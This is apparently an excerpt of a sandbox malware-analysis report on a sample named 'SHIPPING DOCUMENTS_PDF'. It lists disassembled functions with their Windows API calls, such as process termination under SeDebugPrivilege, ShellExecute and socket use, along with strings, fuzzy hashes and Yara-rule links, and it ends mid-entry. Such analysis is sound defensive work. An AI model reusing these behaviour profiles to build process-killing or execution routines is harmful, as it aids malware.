                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                    • String ID: SysListView32
                                                                                    • API String ID: 307300125-78025650
                                                                                    • Opcode ID: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                                                                    • Instruction ID: 54435105c8d705264a2a95915483222ea2d25cffa07e8da99b247ccd58f8900e
                                                                                    • Opcode Fuzzy Hash: cb4bbc19a8e63b6e992eae49b9111cdc8440aa379bd2c5f9a200c4fc2d2b7b5c
                                                                                    • Instruction Fuzzy Hash: 61419171A00349ABEB21DF64CC85BEEB7E9EF08350F1044AAF585E72D1E6719D84CB60
                                                                                    Function 00BCE933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BB3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                                                      • Part of subcall function 00BB3C55: Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                                                      • Part of subcall function 00BB3C55: CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9A4
                                                                                    • GetLastError.KERNEL32 ref: 00BCE9B7
                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BCE9E6
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BCEA63
                                                                                    • GetLastError.KERNEL32(00000000), ref: 00BCEA6E
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BCEAA3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                    • String ID: SeDebugPrivilege
                                                                                    • API String ID: 2533919879-2896544425
                                                                                    • Opcode ID: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                                                                    • Instruction ID: 2c52e6d997bf8662f19e17aa5353e2a21a35734eef7b36b86a60e74455294348
                                                                                    • Opcode Fuzzy Hash: ad5fd41ceb5a81f72ffd472ad1f3be7f760b4862ed6feed055bc34268219fc21
                                                                                    • Instruction Fuzzy Hash: B44176716042019FDB14EF24C8A5F6ABBE5AF41310F0884A9F9169B2D2DBB5E908CF95
                                                                                    Function 00BB2F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00BB3033
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoad
                                                                                    • String ID: blank$info$question$stop$warning
                                                                                    • API String ID: 2457776203-404129466
                                                                                    • Opcode ID: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                                                                    • Instruction ID: 279671bcd3049b663961749dc22a7862fc5ed97b8ff513e96bda0c3e07e1bf67
                                                                                    • Opcode Fuzzy Hash: eb63b832bf55f156e2493d9bad6061e106f14535279d4e1329078d0dc91556ee
                                                                                    • Instruction Fuzzy Hash: 9711053124C386BFE714AB14DC82EFB67DCDF19760B6080AAF904A61C1EAE06F4456A4
                                                                                    Function 00BB42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BB4312
                                                                                    • LoadStringW.USER32(00000000), ref: 00BB4319
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BB432F
                                                                                    • LoadStringW.USER32(00000000), ref: 00BB4336
                                                                                    • _wprintf.LIBCMT ref: 00BB435C
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BB437A
                                                                                    Strings
                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00BB4357
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                    • API String ID: 3648134473-3128320259
                                                                                    • Opcode ID: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                                                                    • Instruction ID: 20859626d56e952e0f7fbd7b6383b2f0537a4cb310b7a21ea06ab51e6c0d136f
                                                                                    • Opcode Fuzzy Hash: 3a1ccdc2e7fb3b5d32026e597e78ee804d3e264cd3244780e599d53550b35dda
                                                                                    • Instruction Fuzzy Hash: 3A0162F2905209BFE71197A4DD89EF6B7ACEB08700F0045B2B74AE3051FA749E858B74
                                                                                    Function 00BDD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BDD47C
                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00BDD49C
                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BDD6D7
                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BDD6F5
                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BDD716
                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00BDD735
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00BDD75A
                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BDD77D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                    • String ID:
                                                                                    • API String ID: 1211466189-0
                                                                                    • Opcode ID: 00de61638db33172f6198430898606582c2abc46a677febbec9f17bff352dd2a
                                                                                    • Instruction ID: 3721af3fac14309b46839b6c91a9b704ef0eef80e718fb9bb4ebb757aedede5b
                                                                                    • Opcode Fuzzy Hash: 00de61638db33172f6198430898606582c2abc46a677febbec9f17bff352dd2a
                                                                                    • Instruction Fuzzy Hash: 0AB16A75600216EBDF14CF68C9D57ADBBF1FF04701F0880AAEC899B295E734A950CB90
                                                                                    Function 00B52A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B52ACF
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00B52B17
                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C21A
                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B8C1C7,00000004,00000000,00000000,00000000), ref: 00B8C286
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: d3b72d7cdb9fb9c2b4e394d347761443ca554549a36acc9c62c0e6949840ede0
                                                                                    • Instruction ID: de069cde4ea2fa0b9d9a658cdb92d8343ab329911117e22a3638f6d3a93df752
                                                                                    • Opcode Fuzzy Hash: d3b72d7cdb9fb9c2b4e394d347761443ca554549a36acc9c62c0e6949840ede0
                                                                                    • Instruction Fuzzy Hash: DD41DB7160AA80DAD7399F28CCD8B7A7FD2EB8B311F1484D9E847475B1C671984DD720
                                                                                    Function 00BB70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BB70DD
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BB7114
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00BB7130
                                                                                    • _memmove.LIBCMT ref: 00BB717E
                                                                                    • _memmove.LIBCMT ref: 00BB719B
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00BB71AA
                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BB71BF
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BB71DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 256516436-0
                                                                                    • Opcode ID: 354aab277e1aac2e17c941ddc0de35be5b69f639d769feac49963326894dd560
                                                                                    • Instruction ID: 8e6dc94807faaa4660b303ef2cf182f9d24d7464a7e41fe4f9779cac4e0941c8
                                                                                    • Opcode Fuzzy Hash: 354aab277e1aac2e17c941ddc0de35be5b69f639d769feac49963326894dd560
                                                                                    • Instruction Fuzzy Hash: C2316F31904205EBCF10EFA4DC85AAFB7B8EF45710F1481B6F904AB256EB709E10CBA0
                                                                                    Function 00BD61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteObject.GDI32(00000000), ref: 00BD61EB
                                                                                    • GetDC.USER32(00000000), ref: 00BD61F3
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BD61FE
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00BD620A
                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BD6246
                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BD6257
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BD902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00BD6291
                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BD62B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3864802216-0
                                                                                    • Opcode ID: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                                                                    • Instruction ID: 58320627a38f12c6b31a765718c09a6c68eb357c8a950cf35cfc0ee56b52f80b
                                                                                    • Opcode Fuzzy Hash: 5a63fc2033b27f4c374de811e75b9f3f1545a6a95e47f1fbe4d2f5725050be3e
                                                                                    • Instruction Fuzzy Hash: D5319F72101214BFEB108F10CC8AFFA7BA9EF49761F044066FE099B291EA759C41CB60
                                                                                    Function 00BABBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                                                                    • Instruction ID: b65070f8860553911351b269b4db5a90976c6b27e3f48c14b463a08817441a34
                                                                                    • Opcode Fuzzy Hash: b036e3cbf9fc5c00411bc4e1491a8b980a2c1ce9b9d79ca864571c81e3eb486b
                                                                                    • Instruction Fuzzy Hash: 0C21D4716092057BA304672A9D82FBF73DDEE12358F0884E0FD28A6783FB24DE1185B1
                                                                                    Function 00BBEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • _wcstok.LIBCMT ref: 00BBEC94
                                                                                    • _wcscpy.LIBCMT ref: 00BBED23
                                                                                    • _memset.LIBCMT ref: 00BBED56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                    • String ID: X
                                                                                    • API String ID: 774024439-3081909835
                                                                                    • Opcode ID: 3e5384bc82bd3a4a9dc984de0c762bcf3c6020137805b2c62fddb79aa7e3f889
                                                                                    • Instruction ID: 67d0dc75a47dbaf4c1cd542a69943d46c80cbc713d4ee4d5b67083b182488180
                                                                                    • Opcode Fuzzy Hash: 3e5384bc82bd3a4a9dc984de0c762bcf3c6020137805b2c62fddb79aa7e3f889
                                                                                    • Instruction Fuzzy Hash: B4C19271608700DFC764EF24D891AAAB7E0EF45311F0449ADF899972A1DB70EC49CB92
                                                                                    Function 00BC6B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00BC6C00
                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BC6C21
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6C34
                                                                                    • htons.WSOCK32(?), ref: 00BC6CEA
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00BC6CA7
                                                                                      • Part of subcall function 00BAA7E9: _strlen.LIBCMT ref: 00BAA7F3
                                                                                      • Part of subcall function 00BAA7E9: _memmove.LIBCMT ref: 00BAA815
                                                                                    • _strlen.LIBCMT ref: 00BC6D44
                                                                                    • _memmove.LIBCMT ref: 00BC6DAD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 3619996494-0
                                                                                    • Opcode ID: d157df0ff9377a1dc7eb16005d16188e11d48cda458d70f27725e0426027107e
                                                                                    • Instruction ID: 433bfdc74c12be102462d37a90cfcad9a6b5e07748f2c6317b605d096bf1c2e6
                                                                                    • Opcode Fuzzy Hash: d157df0ff9377a1dc7eb16005d16188e11d48cda458d70f27725e0426027107e
                                                                                    • Instruction Fuzzy Hash: 6181A071208300ABD710EB24CC96F6AB7E8EF84714F1449ADF9569B2E2DB70DD05CB62
                                                                                    Function 00B51424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                                                                    • Instruction ID: 31349031bf218e576fdf863db0cd4d532f5827a5a06894e70f0980a4d669c65d
                                                                                    • Opcode Fuzzy Hash: 2e604f0e3fd85da4e6adbfd466010a07f93b6798e7be2d3f8387d6bed3311909
                                                                                    • Instruction Fuzzy Hash: 4A716734901109EFCB049F98CC89FBEBBB9FF85311F148599E916AB251D730AA15CFA4
                                                                                    Function 00BDB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsWindow.USER32(00D552E0), ref: 00BDB3EB
                                                                                    • IsWindowEnabled.USER32(00D552E0), ref: 00BDB3F7
                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00BDB4DB
                                                                                    • SendMessageW.USER32(00D552E0,000000B0,?,?), ref: 00BDB512
                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 00BDB54F
                                                                                    • GetWindowLongW.USER32(00D552E0,000000EC), ref: 00BDB571
                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BDB589
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                    • String ID:
                                                                                    • API String ID: 4072528602-0
                                                                                    • Opcode ID: cbf514c8ece1f3057e96e5fc0513b3f80131cb47b980576147ad49dbd3b5c18e
                                                                                    • Instruction ID: c6be3d1cce2d41069dcd5b7f4d45ac0a43607b947e9b5e9c17488becd6f784f7
                                                                                    • Opcode Fuzzy Hash: cbf514c8ece1f3057e96e5fc0513b3f80131cb47b980576147ad49dbd3b5c18e
                                                                                    • Instruction Fuzzy Hash: 3271AB34605204EFDB21DF54C8A0FBAFBE9EF4A310F15809AE946973A2E731A940DB54
                                                                                    Function 00BCF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00BCF448
                                                                                    • _memset.LIBCMT ref: 00BCF511
                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00BCF556
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                      • Part of subcall function 00B6FC86: _wcscpy.LIBCMT ref: 00B6FCA9
                                                                                    • GetProcessId.KERNEL32(00000000), ref: 00BCF5CD
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BCF5FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                    • String ID: @
